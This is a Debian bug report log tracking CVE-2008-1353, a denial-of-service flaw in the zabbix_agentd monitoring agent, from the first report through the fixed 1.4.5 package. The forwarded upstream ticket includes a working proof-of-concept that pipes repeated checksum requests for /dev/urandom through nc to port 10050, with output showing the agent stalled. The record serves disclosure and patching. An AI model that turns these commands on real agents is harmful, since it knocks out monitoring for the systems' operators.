zabbix: CVE-2008-1353 local or remote DoS for authenticated hosts

Debian Bug report logs - #471678
zabbix: CVE-2008-1353 local or remote DoS for authenticated hosts

Toggle useless messages

Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

From: Nico Golde <nion@debian.org>

To: submit@bugs.debian.org

Subject: zabbix: CVE-2008-1353 local or remote DoS for authenticated hosts

Date: Wed, 19 Mar 2008 15:01:49 +0100

[Message part 1 (text/plain, inline)]

Package: zabbix
Severity: grave
Tags: security

Hi,
the following CVE (Common Vulnerabilities & Exposures) id was
published for zabbix.

CVE-2008-1353[0]:
| zabbix_agentd in ZABBIX 1.4.4 allows remote attackers to cause a
| denial of service (CPU and connection consumption) via multiple
| vfs.file.cksum commands with a special device node such as
| /dev/urandom or /dev/zero.

This should just work for authenticated hosts or hosts with 
a spoofed IP address. However from what I see this is also 
useable for local users.

If you fix this vulnerability please also include the CVE id
in your changelog entry.

For further information:
[0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1353

Kind regards
Nico

-- 
Nico Golde - http://www.ngolde.de - nion@jabber.ccc.de - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.

[Message part 2 (application/pgp-signature, inline)]

Message #10 received at 471678@bugs.debian.org (full text, mbox, reply):

From: Michael Ablassmeier <abi@grinser.de>

To: Nico Golde <nion@debian.org>

Cc: 471678@bugs.debian.org

Subject: Re: zabbix: CVE-2008-1353 local or remote DoS for authenticated hosts

Date: Tue, 25 Mar 2008 15:24:53 +0100

hi,

On Wed, Mar 19, 2008 at 03:01:49PM +0100, Nico Golde wrote:
> Hi,
> the following CVE (Common Vulnerabilities & Exposures) id was
> published for zabbix.
> 
> CVE-2008-1353[0]:
> | zabbix_agentd in ZABBIX 1.4.4 allows remote attackers to cause a
> | denial of service (CPU and connection consumption) via multiple
> | vfs.file.cksum commands with a special device node such as
> | /dev/urandom or /dev/zero.
> 
> This should just work for authenticated hosts or hosts with 
> a spoofed IP address. However from what I see this is also 
> useable for local users.

thanks for you report, this issue has been reportet to upstream
(ZBX-328) but no patch so far. Waiting for a patch .. 

bye,
    - michael

Message #15 received at 471678@bugs.debian.org (full text, mbox, reply):

From: Michael Ablassmeier <abi@grinser.de>

To: 471678@bugs.debian.org

Subject: [support@zabbix.com: [ZABBIX] Closed: (ZBX-328) Possible DoS against zabbix-agentd]

Date: Tue, 25 Mar 2008 15:54:58 +0100

hi,

see upstreams response.

----- Forwarded message from "Alexei Vladishev (ZABBIX Support)" <support@zabbix.com> -----

From: "Alexei Vladishev (ZABBIX Support)" <support@zabbix.com>
Date: Tue, 25 Mar 2008 16:31:18 +0200 (EET)
To: abi@debian.org
Subject: [ZABBIX] Closed: (ZBX-328) Possible DoS against zabbix-agentd


     [ https://support.zabbix.com/browse/ZBX-328?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Alexei Vladishev closed ZBX-328.
--------------------------------

    Resolution: Fixed

The problem was fixed a couple of months ago. Please wait for 1.4.5. It will be released this week.

Alexei

> Possible DoS against zabbix-agentd
> ----------------------------------
>
>                 Key: ZBX-328
>                 URL: https://support.zabbix.com/browse/ZBX-328
>             Project: ZABBIX
>          Issue Type: Bug
>          Components: Agent (Unix)
>         Environment: Debian etch, kernel 2.6.18, Intel(R) Pentium(R) 4 CPU 2.80GHz
>            Reporter: Milen Rangelov
>            Assignee: Alexei Vladishev
>
> An authorized host can cause the zabbix_agentd to hang, overconsuming CPU resources.
> This can be triggered by sending the agent a file checksum request (vfs.file.cksum[file]) with file argument being some "special" device file like /dev/zero or /dev/urandom (the latter rises kernel CPU usage even more).
> If the malicious user sends <number_of_zabbix_agentd_children> requests, then the zabbix_agentd service will not be able to serve any requests until it's restarted.
> Here's some example session :
> ------------
> gat3way:/etc/zabbix# echo "vfs.file.cksum[/dev/urandom]" | nc localhost 10050 &
> [1] 24429
> gat3way:/etc/zabbix# echo "vfs.file.cksum[/dev/urandom]" | nc localhost 10050 &
> [2] 24431
> gat3way:/etc/zabbix# echo "vfs.file.cksum[/dev/urandom]" | nc localhost 10050 &
> [3] 24433
> gat3way:/etc/zabbix# echo "vfs.file.cksum[/dev/urandom]" | nc localhost 10050 &
> [4] 24435
> ...and some output from top:
> <snip>
> Tasks: 183 total,   5 running, 178 sleeping,   0 stopped,   0 zombie 
> Cpu(s):  2.0%us, 97.0%sy,  1.0%ni,  0.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
> <snip>
>     PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
> 24381 zabbix    30   5  5056 1032  768 R   65  0.1   4:16.01 zabbix_agentd
> 24382 zabbix    30   5  5068 1044  776 R   50  0.1   4:12.18 zabbix_agentd
> 24380 zabbix    30   5  5068 1044  776 R   50  0.1   4:01.24 zabbix_agentd
> 24379 zabbix    30   5  5056 1036  772 R   31  0.1   4:08.24 zabbix_agentd
> ------------------------
> zabbix_agentd accepts new connections, but does not serve them.
> The malicious user needs to connect from an authorized host, but it's not so hard to spoof it if he's on the same ethernet segment as the host running the zabbix_agent.

-- 
This message is automatically generated by JIRA.
-
If you think it was sent incorrectly contact one of the administrators: https://support.zabbix.com/secure/Administrators.jspa
-
For more information on JIRA, see: http://www.atlassian.com/software/jira

        

----- End forwarded message -----

Message #20 received at 471678@bugs.debian.org (full text, mbox, reply):

From: Nico Golde <nion@debian.org>

To: 471678@bugs.debian.org

Subject: Re: zabbix: CVE-2008-1353 local or remote DoS for authenticated hosts

Date: Tue, 25 Mar 2008 16:29:04 +0100

[Message part 1 (text/plain, inline)]

Hi Michael,
* Michael Ablassmeier <abi@grinser.de> [2008-03-25 16:25]:
> On Wed, Mar 19, 2008 at 03:01:49PM +0100, Nico Golde wrote:
[...] 
> > This should just work for authenticated hosts or hosts with 
> > a spoofed IP address. However from what I see this is also 
> > useable for local users.
> 
> thanks for you report, this issue has been reportet to upstream
> (ZBX-328) but no patch so far. Waiting for a patch .. 

I also already contacted them for a patch. They told me they 
will do a new release this week that fixes the issue and it 
is already fixed in the beta version.

Kind regards
Nico

-- 
Nico Golde - http://www.ngolde.de - nion@jabber.ccc.de - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.

[Message part 2 (application/pgp-signature, inline)]

Message #25 received at 471678-close@bugs.debian.org (full text, mbox, reply):

From: Michael Ablassmeier <abi@debian.org>

To: 471678-close@bugs.debian.org

Subject: Bug#471678: fixed in zabbix 1:1.4.5-1

Date: Thu, 27 Mar 2008 12:17:08 +0000

Source: zabbix
Source-Version: 1:1.4.5-1

We believe that the bug you reported is fixed in the latest version of
zabbix, which is due to be installed in the Debian FTP archive:

zabbix-agent_1.4.5-1_amd64.deb
  to pool/main/z/zabbix/zabbix-agent_1.4.5-1_amd64.deb
zabbix-frontend-php_1.4.5-1_all.deb
  to pool/main/z/zabbix/zabbix-frontend-php_1.4.5-1_all.deb
zabbix-server-mysql_1.4.5-1_amd64.deb
  to pool/main/z/zabbix/zabbix-server-mysql_1.4.5-1_amd64.deb
zabbix-server-pgsql_1.4.5-1_amd64.deb
  to pool/main/z/zabbix/zabbix-server-pgsql_1.4.5-1_amd64.deb
zabbix_1.4.5-1.diff.gz
  to pool/main/z/zabbix/zabbix_1.4.5-1.diff.gz
zabbix_1.4.5-1.dsc
  to pool/main/z/zabbix/zabbix_1.4.5-1.dsc
zabbix_1.4.5.orig.tar.gz
  to pool/main/z/zabbix/zabbix_1.4.5.orig.tar.gz



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 471678@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Michael Ablassmeier <abi@debian.org> (supplier of updated zabbix package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Thu, 27 Mar 2008 12:15:28 +0100
Source: zabbix
Binary: zabbix-agent zabbix-server-mysql zabbix-server-pgsql zabbix-frontend-php
Architecture: source amd64 all
Version: 1:1.4.5-1
Distribution: unstable
Urgency: high
Maintainer: abi@grinser.de
Changed-By: Michael Ablassmeier <abi@debian.org>
Description: 
 zabbix-agent - software for monitoring of your networks -- agent
 zabbix-frontend-php - software for monitoring of your servers -- php frontend
 zabbix-server-mysql - software for monitoring of your networks -- server
 zabbix-server-pgsql - software for monitoring of your networks -- server
Closes: 471678
Changes: 
 zabbix (1:1.4.5-1) unstable; urgency=high
 .
   * New upstream release
   * Fixed remote DoS (CVE-2008-1353) Closes: #471678
Files: 
 d7d14428ed9035e719c0b078d0e77cfe 875 net optional zabbix_1.4.5-1.dsc
 f87d73852fdab33f99beebfd16c21c63 4137972 net optional zabbix_1.4.5.orig.tar.gz
 9ca3700d1014d064afe2ecb1924d75b8 19834 net optional zabbix_1.4.5-1.diff.gz
 0c0187b176fbdecd1192dcb1a40a7cd6 172896 net optional zabbix-agent_1.4.5-1_amd64.deb
 ce0403fbd83bef7e372f60d466b3875f 367188 net optional zabbix-server-mysql_1.4.5-1_amd64.deb
 519c3fee6c12c51273c0c262ba37266c 372660 net optional zabbix-server-pgsql_1.4.5-1_amd64.deb
 3b07db6fe57dbda9cf365d129f29f6b6 1023688 net optional zabbix-frontend-php_1.4.5-1_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFH64aHEFV7g4B8rCURAv+7AJsGxnWfOeoAlJ9i9KuaJ63MZVxdPgCeIFHu
yn9X1gnKjEr3NTMWUpLC1hw=
=kg/k
-----END PGP SIGNATURE-----

Send a report that this bug log contains spam.